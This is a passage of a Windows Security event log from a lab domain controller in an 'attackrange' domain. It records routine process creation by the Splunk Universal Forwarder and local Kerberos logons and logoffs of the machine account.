Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:19:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264546
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1840
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:19:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264549
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1bb4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:19:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264548
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1588
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:19:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264550
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x530
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:19:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264551
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x828CE5
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:19:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264554
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x82C4D9
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:19:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264553
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x82C4D9
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 62758
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:19:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264552
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x82C4D9
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:20:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264555
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1784
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:20:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264557
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x89c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:20:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264556
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1778
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:20:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264558
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1664
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:20:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264560
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xf34
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:20:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264559
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1728
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:20:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264561
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x920
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:20:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264564
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x82FE05
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:20:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264563
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x82FE05
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 62772
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:20:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264562
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x82FE05
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:21:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264565
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x964
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:21:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264567
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1b84
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:21:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264566
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xb94
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:21:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264568
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1430
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:21:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264570
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1bf8
